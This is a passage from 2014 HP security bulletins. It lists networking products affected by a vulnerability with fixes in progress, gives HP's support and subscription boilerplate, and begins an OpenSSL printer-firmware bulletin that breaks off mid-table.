5500-24G-PoE+-4SFP HI Switch w/2 Slt\nJG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt\nJG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt\nJG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt\nJG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt\nJG681A HP 5500-24G-SFP HI TAA Swch w/2Slt\n\n5500 EI Switch Series\n Fix in progress\nuse mitigations\n JD373A HP 5500-24G DC EI Switch\nJD374A HP 5500-24G-SFP EI Switch\nJD375A HP 5500-48G EI Switch\nJD376A HP 5500-48G-PoE EI Switch\nJD377A HP 5500-24G EI Switch\nJD378A HP 5500-24G-PoE EI Switch\nJD379A HP 5500-24G-SFP DC EI Switch\nJG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts\nJG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts\nJG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts\nJG250A HP 5500-24G EI TAA Switch w 2 Intf Slts\nJG251A HP 5500-48G EI TAA Switch w 2 Intf Slts\nJG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts\nJG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts\n H3C S5500-28C-EI Ethernet Switch (0235A253)\nH3C S5500-28F-EI Eth Switch AC Single (0235A24U)\nH3C S5500-52C-EI Ethernet Switch (0235A24X)\nH3C S5500-28C-EI-DC Ethernet Switch (0235A24S)\nH3C S5500-28C-PWR-EI Ethernet Switch (0235A255)\nH3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259)\nH3C S5500-52C-PWR-EI Ethernet Switch (0235A251)\n\n5500 SI Switch Series\n Fix in progress\nuse mitigations\n JD369A HP 5500-24G SI Switch\nJD370A HP 5500-48G SI Switch\nJD371A HP 5500-24G-PoE SI Switch\nJD372A HP 5500-48G-PoE SI Switch\nJG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts\nJG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts\n H3C S5500-28C-SI Ethernet Switch (0235A04U)\nH3C S5500-52C-SI Ethernet Switch (0235A04V)\nH3C S5500-28C-PWR-SI Ethernet Switch (0235A05H)\nH3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)\n\n5120 EI Switch Series\n Fix in progress\nuse mitigations\n JE066A HP 5120-24G EI Switch\nJE067A HP 5120-48G EI Switch\nJE068A HP 5120-24G EI Switch with 2 Slots\nJE069A HP 5120-48G EI Switch with 2 Slots\nJE070A HP 5120-24G-PoE EI Switch with 2 Slots\nJE071A HP 5120-48G-PoE EI Switch with 2 Slots\nJG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts\nJG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts\nJG245A HP 5120-24G EI TAA Switch w 2 Intf Slts\nJG246A HP 5120-48G EI TAA Switch w 2 Intf Slts\nJG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts\nJG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts\n H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ)\nH3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS)\nH3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR)\nH3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT)\nH3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU)\nH3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)\n\n5120 SI switch Series\n Fix in progress\nuse mitigations\n JE072A HP 5120-48G SI Switch\nJE073A HP 5120-16G SI Switch\nJE074A HP 5120-24G SI Switch\nJG091A HP 5120-24G-PoE+ (370W) SI Switch\nJG092A HP 5120-24G-PoE+ (170W) SI Switch\n H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W)\nH3C S5120-20P-SI L2\n16GE Plus 4SFP (0235A42B)\nH3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D)\nH3C S5120-28P-HPWR-SI (0235A0E5)\nH3C S5120-28P-PWR-SI (0235A0E3)\n\n4800 G Switch Series\n Fix in progress\nuse mitigations\n JD007A HP 4800-24G Switch\nJD008A HP 4800-24G-PoE Switch\nJD009A HP 4800-24G-SFP Switch\nJD010A HP 4800-48G Switch\nJD011A HP 4800-48G-PoE Switch\n\n 3Com Switch 4800G 24-Port (3CRS48G-24-91)\n3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91)\n3Com Switch 4800G 48-Port (3CRS48G-48-91)\n3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91)\n3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91)\n\n4510G Switch Series\n Fix in progress\nuse mitigations\n JF428A HP 4510-48G Switch\nJF847A HP 4510-24G Switch\n\n 3Com Switch 4510G 48 Port (3CRS45G-48-91)\n3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91)\n3Com Switch E4510-24G (3CRS45G-24-91)\n\n4210G Switch Series\n Fix in progress\nuse mitigations\n JF844A HP 4210-24G Switch\nJF845A HP 4210-48G Switch\nJF846A HP 4210-24G-PoE Switch\n\n 3Com Switch 4210-24G (3CRS42G-24-91)\n3Com Switch 4210-48G (3CRS42G-48-91)\n3Com Switch E4210-24G-PoE (3CRS42G-24P-91)\n\n3610 Switch Series\n Fix in progress\nuse mitigations\n JD335A HP 3610-48 Switch\nJD336A HP 3610-24-4G-SFP Switch\nJD337A HP 3610-24-2G-2G-SFP Switch\nJD338A HP 3610-24-SFP Switch\n H3C S3610-52P - model LS-3610-52P-OVS (0235A22C)\nH3C S3610-28P - model LS-3610-28P-OVS (0235A22D)\nH3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E)\nH3C S3610-28F - model LS-3610-28F-OVS (0235A22F)\n\n3600 V2 Switch Series\n Fix in progress\nuse mitigations\n JG299A HP 3600-24 v2 EI Switch\nJG300A HP 3600-48 v2 EI Switch\nJG301A HP 3600-24-PoE+ v2 EI Switch\nJG301B HP 3600-24-PoE+ v2 EI Switch\nJG302A HP 3600-48-PoE+ v2 EI Switch\nJG302B HP 3600-48-PoE+ v2 EI Switch\nJG303A HP 3600-24-SFP v2 EI Switch\nJG304A HP 3600-24 v2 SI Switch\nJG305A HP 3600-48 v2 SI Switch\nJG306A HP 3600-24-PoE+ v2 SI Switch\nJG306B HP 3600-24-PoE+ v2 SI Switch\nJG307A HP 3600-48-PoE+ v2 SI Switch\nJG307B HP 3600-48-PoE+ v2 SI Switch\n\n3100V2\n Fix in progress\nuse mitigations\n JD313B HP 3100-24-PoE v2 EI Switch\nJD318B HP 3100-8 v2 EI Switch\nJD319B HP 3100-16 v2 EI Switch\nJD320B HP 3100-24 v2 EI Switch\nJG221A HP 3100-8 v2 SI Switch\nJG222A HP 3100-16 v2 SI Switch\nJG223A HP 3100-24 v2 SI Switch\n\n3100V2-48\n Fix in progress\nuse mitigations\n JG315A HP 3100-48 v2 Switch\n\n1910\n Fix in progress\nuse mitigations\n JE005A HP 1910-16G Switch\nJE006A HP 1910-24G Switch\nJE007A HP 1910-24G-PoE (365W) Switch\nJE008A HP 1910-24G-PoE(170W) Switch\nJE009A HP 1910-48G Switch\nJG348A HP 1910-8G Switch\nJG349A HP 1910-8G-PoE+ (65W) Switch\nJG350A HP 1910-8G-PoE+ (180W) Switch\n 3Com Baseline Plus Switch 2900 Gigabit Family - 52 port (3CRBSG5293)\n3Com Baseline Plus Switch 2900G - 20 port (3CRBSG2093)\n3Com Baseline Plus Switch 2900G - 28 port (3CRBSG2893)\n3Com Baseline Plus Switch 2900G - 28HPWR (3CRBSG28HPWR93)\n3Com Baseline Plus Switch 2900G - 28PWR (3CRBSG28PWR93)\n\n1810v1 P2\n Fix in progress\nuse mitigations\n J9449A HP 1810-8G Switch\nJ9450A HP 1810-24G Switch\n\n1810v1 PK\n Fix in progress\nuse mitigations\n J9660A HP 1810-48G Switch\n\nMSR20\n Fix in progress\nuse mitigations\n JD432A HP A-MSR20-21 Multi-Service Router\nJD662A HP MSR20-20 Multi-Service Router\nJD663A HP MSR20-21 Multi-Service Router\nJD663B HP MSR20-21 Router\nJD664A HP MSR20-40 Multi-Service Router\nJF228A HP MSR20-40 Router\nJF283A HP MSR20-20 Router\n H3C RT-MSR2020-AC-OVS-H3C (0235A324)\nH3C RT-MSR2040-AC-OVS-H3 (0235A326)\nH3C MSR 20-20 (0235A19H)\nH3C MSR 20-21 (0235A325)\nH3C MSR 20-40 (0235A19K)\nH3C MSR-20-21 Router (0235A19J)\n\nMSR20-1X\n Fix in progress\nuse mitigations\n JD431A HP MSR20-10 Router\nJD667A HP MSR20-15 IW Multi-Service Router\nJD668A HP MSR20-13 Multi-Service Router\nJD669A HP MSR20-13 W Multi-Service Router\nJD670A HP MSR20-15 A Multi-Service Router\nJD671A HP MSR20-15 AW Multi-Service Router\nJD672A HP MSR20-15 I Multi-Service Router\nJD673A HP MSR20-11 Multi-Service Router\nJD674A HP MSR20-12 Multi-Service Router\nJD675A HP MSR20-12 W Multi-Service Router\nJD676A HP MSR20-12 T1 Multi-Service Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\nJG209A HP MSR20-12-T-W Router (NA)\nJG210A HP MSR20-13-W Router (NA)\n H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\nH3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-11 (0235A31V)\nH3C MSR 20-12 (0235A32E)\nH3C MSR 20-12 T1 (0235A32B)\nH3C MSR 20-13 (0235A31W)\nH3C MSR 20-13 W (0235A31X)\nH3C MSR 20-15 A (0235A31Q)\nH3C MSR 20-15 A W (0235A31R)\nH3C MSR 20-15 I (0235A31N)\nH3C MSR 20-15 IW (0235A31P)\nH3C MSR20-12 W (0235A32G)\n\nMSR30\n Fix in progress\nuse mitigations\n JD654A HP MSR30-60 POE Multi-Service Router\nJD657A HP MSR30-40 Multi-Service Router\nJD658A HP MSR30-60 Multi-Service Router\nJD660A HP MSR30-20 POE Multi-Service Router\nJD661A HP MSR30-40 POE Multi-Service Router\nJD666A HP MSR30-20 Multi-Service Router\nJF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF232A HP RT-MSR3040-AC-OVS-AS-H3\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S)\nH3C MSR 30-20 (0235A19L)\nH3C MSR 30-20 POE (0235A239)\nH3C MSR 30-40 (0235A20J)\nH3C MSR 30-40 POE (0235A25R)\nH3C MSR 30-60 (0235A20K)\nH3C MSR 30-60 POE (0235A25S)\nH3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)\n\nMSR30-16\n Fix in progress\nuse mitigations\n JD659A HP MSR30-16 POE Multi-Service Router\nJD665A HP MSR30-16 Multi-Service Router\nJF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\nH3C MSR 30-16 (0235A237)\nH3C MSR 30-16 POE (0235A238)\n\nMSR30-1X\n Fix in progress\nuse mitigations\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\nH3C RT-MSR3011-AC-OVS-H3 (0235A29L)\n\nMSR50\n Fix in progress\nuse mitigations\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\n\nMSR50-G2\n Fix in progress\nuse mitigations\n JD429A HP MSR50 G2 Processor Module\nJD429B HP MSR50 G2 Processor Module\n H3C H3C MSR 50 Processor Module-G2 (0231A84Q)\nH3C MSR 50 High Performance Main Processing Unit 3GE (Combo)\n256F/1GD(0231A0KL)\n\nMSR20 Russian version\n Fix in progress\nuse mitigations\n JD663B HP MSR20-21 Router\nJF228A HP MSR20-40 Router\nJF283A HP MSR20-20 Router\n H3C RT-MSR2020-AC-OVS-H3C (0235A324)\nH3C RT-MSR2040-AC-OVS-H3 (0235A326)\n\nMSR20-1X Russian version\n Fix in progress\nuse mitigations\n JD431A HP MSR20-10 Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\n H3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\n\nMSR30 Russian version\n Fix in progress\nuse mitigations\n JF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\n\nMSR30-1X Russian version\n Fix in progress\nuse mitigations\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C RT-MSR3011-AC-OVS-H3 (0235A29L)\nH3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\n\nMSR30-16 Russian version\n Fix in progress\nuse mitigations\n JF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\n\nMSR50 Russian version\n Fix in progress\nuse mitigations\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR 50 Processor Module (0231A791)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\n\nMSR50 G2 Russian version\n Fix in progress\nuse mitigations\n JD429B HP MSR50 G2 Processor Module\n H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD\n(0231A0KL)\n\nMSR9XX\n Fix in progress\nuse mitigations\n JF812A HP MSR900 Router\nJF813A HP MSR920 Router\nJF814A HP MSR900-W Router\nJF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr\nJG207A HP MSR900-W Router (NA)\nJG208A HP MSR920-W Router (NA)\n H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b\n(0235A0C2)\nH3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX)\nH3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4)\nH3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\n\nMSR9XX Russian version\n Fix in progress\nuse mitigations\n JF812A HP MSR900 Router\nJF813A HP MSR920 Router\nJF814A HP MSR900-W Router\nJF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr\n H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX)\nH3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\nH3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2)\nH3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4)\n\nMSR93X\n Fix in progress\nuse mitigations\n JG511A HP MSR930 Router\nJG512A HP MSR930 Wireless Router\nJG513A HP MSR930 3G Router\nJG514A HP MSR931 Router\nJG515A HP MSR931 3G Router\nJG516A HP MSR933 Router\nJG517A HP MSR933 3G Router\nJG518A HP MSR935 Router\nJG519A HP MSR935 Wireless Router\nJG520A HP MSR935 3G Router\nJG531A HP MSR931 Dual 3G Router\nJG596A HP MSR930 4G LTE/3G CDMA Router\nJG597A HP MSR936 Wireless Router\nJG665A HP MSR930 4G LTE/3G WCDMA Global Router\nJG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n\nMSR93X Russian version\n Fix in progress\nuse mitigations\n JG511A HP MSR930 Router\nJG512A HP MSR930 Wireless Router\nJG513A HP MSR930 3G Router\nJG514A HP MSR931 Router\nJG515A HP MSR931 3G Router\nJG516A HP MSR933 Router\nJG517A HP MSR933 3G Router\nJG518A HP MSR935 Router\nJG519A HP MSR935 Wireless Router\nJG520A HP MSR935 3G Router\nJG531A HP MSR931 Dual 3G Router\nJG596A HP MSR930 4G LTE/3G CDMA Router\nJG597A HP MSR936 Wireless Router\nJG665A HP MSR930 4G LTE/3G WCDMA Global Router\nJG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n\nMSR1000\n Fix in progress\nuse mitigations\n JG732A HP MSR1003-8 AC Router\n\nMSR2000\n Fix in progress\nuse mitigations\n JG411A HP MSR2003 AC Router\n\nMSR3000\n Fix in progress\nuse mitigations\n JG404A HP MSR3064 Router\nJG405A HP MSR3044 Router\nJG406A HP MSR3024 AC Router\nJG409A HP MSR3012 AC Router\nJG861A HP MSR3024 TAA-compliant AC Router\n\nMSR4000\n Fix in progress\nuse mitigations\n JG402A HP MSR4080 Router Chassis\nJG403A HP MSR4060 Router Chassis\nJG412A HP MSR4000 MPU-100 Main Processing Unit\n\nF5000\n Fix in progress\nuse mitigations\n JG216A HP F5000 Firewall Standalone Chassis\nJD259A HP A5000-A5 VPN Firewall Chassis\n H3C SecPath F5000-A5 Host System (0150A0AG)\n\nU200S and CS\n Fix in progress\nuse mitigations\n JD268A HP 200-CS UTM Appliance\nJD273A HP U200-S UTM Appliance\n H3C SecPath U200-S (0235A36N)\n\nU200A and M\n Fix in progress\nuse mitigations\n JD274A HP 200-M UTM Appliance\nJD275A HP U200-A UTM Appliance\n H3C SecPath U200-A (0235A36Q)\n\nF1000A and S\n Fix in progress\nuse mitigations\n JD270A HP S1000-S VPN Firewall Appliance\nJD271A HP S1000-A VPN Firewall Appliance\nJG213A HP F1000-S-EI VPN Firewall Appliance\nJG214A HP F1000-A-EI VPN Firewall Appliance\n\nSecBlade FW\n Fix in progress\nuse mitigations\n JC635A HP 12500 VPN Firewall Module\nJD245A HP 9500 VPN Firewall Module\nJD249A HP 10500/7500 Advanced VPN Firewall Mod\nJD250A HP 6600 Firewall Processing Rtr Module\nJD251A HP 8800 Firewall Processing Module\nJD255A HP 5820 VPN Firewall Module\n H3C S9500E SecBlade VPN Firewall Module (0231A0AV)\nH3C S7500E SecBlade VPN Firewall Module (0231A832)\nH3C SR66 Gigabit Firewall Module (0231A88A)\nH3C SR88 Firewall Processing Module (0231A88L)\nH3C S5820 SecBlade VPN Firewall Module (0231A94J)\n\nF1000E\n Fix in progress\nuse mitigations\n JD272A HP S1000-E VPN Firewall Appliance\n\nVSR1000\n Fix in progress\nuse mitigations\n JG810AAE HP VSR1001 Virtual Services Router\nJG811AAE HP VSR1001 Virtual Services Router\nJG812AAE HP VSR1004 Virtual Services Router\nJG813AAE HP VSR1008 Virtual Services Router\n\nWX5002/5004\n Fix in progress\nuse mitigations\n JD441A HP 5800 ACM for 64-256 APs\nJD447B HP WX5002 Access Controller\nJD448A HP A-WX5004 Access Controller\nJD448B HP WX5004 Access Controller\nJD469A HP A-WX5004 (3Com) Access Controller\nJG261A HP 5800 Access Controller OAA TAA Mod\n\nHP 850/870\n Fix in progress\nuse mitigations\n JG723A HP 870 Unified Wired-WLAN Appliance\nJG725A HP 870 Unifd Wrd-WLAN TAA Applnc\n\nHP 830\n Fix in progress\nuse mitigations\n JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch\nJG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch\nJG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch\nJG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch\n\nHP 6000\n Fix in progress\nuse mitigations\n JG639A HP 10500/7500 20G Unified Wired-WLAN Mod\nJG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod\n\nM220\n Fix in progress\nuse mitigations\n J9798A HP M220 802.11n AM Access Point\nJ9799A HP M220 802.11n WW Access Point\n\nNGFW\n Fix in progress\nuse mitigations\n JC882A HP S1050F NGFW Aplnc w/DVLabs 1-yr Lic\nJC883A HP S3010F NGFW Aplnc w/DVLabs 1-yr Lic\nJC884A HP S3020F NGFW Aplnc w/DVLabs 1-yr Lic\nJC885A HP S8005F NGFW Aplnc w/DVLabs 1-yr Lic\nJC886A HP S8010F NGFW Aplnc w/DVLabs 1-yr Lic\n\niMC UAM 7.0\n Fix in progress\nuse mitigations\n JD144A HP IMC UAM S/W Module w/200-User License\nJF388A HP IMC UAM S/W Module w/200-user License\nJD435A HP IMC EAD Client Software\nJF388AAE HP IMC UAM S/W Module w/200-user E-LTU\nJG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU\n\niMC EAD 7.0\n Fix in progress\nuse mitigations\n JF391AAE HP IMC EAD S/W Module w/200-user E-LTU\nJG754AAE HP IMC EAD SW Module w/ 50-user E-LTU\nJD147A HP IMC Endpoint Admission Defense Software Module with 200-user\nLicense\nJF391A HP IMC EAD S/W Module w/200-user License\n\niMC PLAT 7.0\n Fix in progress\nuse mitigations\n JF377AAE HP IMC Standard Edition Software Platform with 100-node E-LTU\nJG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU\nJG747AAE HP IMC Standard Software Platform with 50-node E-LTU\nJG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU\nJD125A HP IMC Standard Edition Software Platform with 100-node License\nJD815A HP IMC Standard Edition Software Platform with 100-node License\nJD816A HP A-IMC Standard Edition Software DVD Media\nJF377A HP IMC Standard Edition Software Platform with 100-node License\nJF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU\nJF289AAE HP Enterprise Management System to Intelligent Management Center\nUpgrade E-LTU\nTJ635AAE HP IMC for ANM 50 node pack SW E-LTU (On HP Softwares CPL\nnot HPNs)\nJF378AAE HP IMC Enterprise Edition Software Platform with 200-Node E-LTU\nJG748AAE HP IMC Enterprise Software Platform with 50-node E-LTU\nJD126A HP A-IMC Enterprise Software Platform with 200-node License\nJD808A HP A-IMC Enterprise Software Platform with 200-node License\nJD814A HP A-IMC Enterprise Edition Software DVD Media\nJF378A HP IMC Enterprise Edition Software Platform with 200-node License\nJG546AAE HP IMC Basic SW Platform w/50-node E-LTU\nJG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\nJG550AAE HP PMM to IMC Bsc WLM Upgr w/150 AP E-LTU\nJG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU\nJG659AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU\nJG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU\nJG660AAE HP IMC Smart Connect w / WLAN Manager Virtual Appliance Edition\nE-LTU\nJG767AAE HP IMC Smart Connect with Wireless Service Manager Virtual Appliance\nSoftware E-LTU\n\nHISTORY\nVersion:1 (rev.1) - 20 June 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlOkrM4ACgkQ4B86/C0qfVn7/QCeK5T1H9dXfVQgIKSr5USqLmvq\nCtMAnjujH7e5aXfIOvxyyuB0FcSwIWCM\n=CEL7\n-----END PGP SIGNATURE-----\n. \nOpenSSL is a 3rd party product that is embedded with some HP printer\nproducts. This bulletin notifies HP Printer customers about impacted\nproducts. To obtain the updated firmware, go to www.hp.com and follow\nthese steps:\n\nSelect \"Drivers \u0026 Software\". \nEnter the appropriate product name listed in the table below into the search\nfield. \nClick on \"Search\". \nClick on the appropriate product. \nUnder \"Select operating system\" click on \"Cross operating system (BIOS,\nFirmware, Diagnostics, etc.)\"\nNote: If the \"Cross operating system ...\" link is not present, select\napplicable Windows operating system from the list. \nSelect the appropriate firmware update under \"Firmware\". \n\nFirmware Updates Table\n\nProduct Name\n Model Number\n Firmware Revision\n\nHP Color LaserJet CM4540 MFP\n CC419A, 